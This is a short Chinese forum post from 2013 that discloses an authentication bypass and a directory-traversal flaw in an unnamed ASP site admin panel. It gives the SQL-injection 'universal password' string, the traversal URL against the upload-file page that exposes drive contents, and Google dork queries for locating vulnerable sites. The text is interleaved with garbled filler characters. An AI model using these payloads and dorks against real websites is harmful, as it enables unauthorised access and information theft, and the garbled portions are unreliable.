后台万能密码 'or'='or' A/ K/ D' ]5 l. l/ T; ]6 B
5 Y; B' h0 a/ H# B+ i后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
( ?6 Q6 g7 [3 k2 yadmin/uploadfile.asp?currentFolder=/upfiles/../
, n R9 z+ |( V) v3 }5 Q. R8 E, ?4 H8 C4 L
漏洞证明:
" W3 x+ Q0 u- N0 A( [
5 o2 G, ^3 _# k( S( t) O/ \3 u; S2 z谷歌:inurl:type.asp?id=1 新闻中心
0 ]6 F" y' X* d) n& T" h/ Y或者 :inurl:download_ok.asp?% ^! Z3 D9 ] [7 F* B% Z+ N
3 n* k9 p+ E- b/ S0 L0 ~0 A |
发表于 2013-3-14 20:17:32
收藏
支持
反对